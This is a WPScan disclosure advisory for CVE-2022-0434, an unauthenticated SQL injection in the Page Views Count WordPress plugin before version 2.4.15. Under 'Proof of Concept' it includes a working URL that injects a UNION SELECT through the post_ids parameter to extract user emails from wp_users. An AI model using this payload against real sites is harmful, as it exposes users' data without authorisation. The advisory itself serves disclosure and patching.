WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Page Views Count < 2.4.15 - Unauthenticated SQL Injection

Description

The plugin does not sanitise and escape the post_ids parameter before using it in a SQL statement via a REST endpoint, available to both unauthenticated and authenticated users. As a result, unauthenticated attackers could perform SQL injection attacks

Proof of Concept

https://example.com/?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20user_email,user_email,user_email%20from%20wp_users%20--%20g

Affects Plugins

page-views-count
Fixed in version 2.4.15

References

CVE
CVE-2022-0434

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website
https://kazet.cc/
Verified

Yes

WPVDB ID
be895016-7365-4ce4-a54f-f36d0ef2d6f1

Timeline

Publicly Published

2022-02-01 (about 12 months ago)

Added

2022-02-01 (about 12 months ago)

Last Updated

2022-04-13 (about 9 months ago)

Our Other Services

WPScan WordPress Security Plugin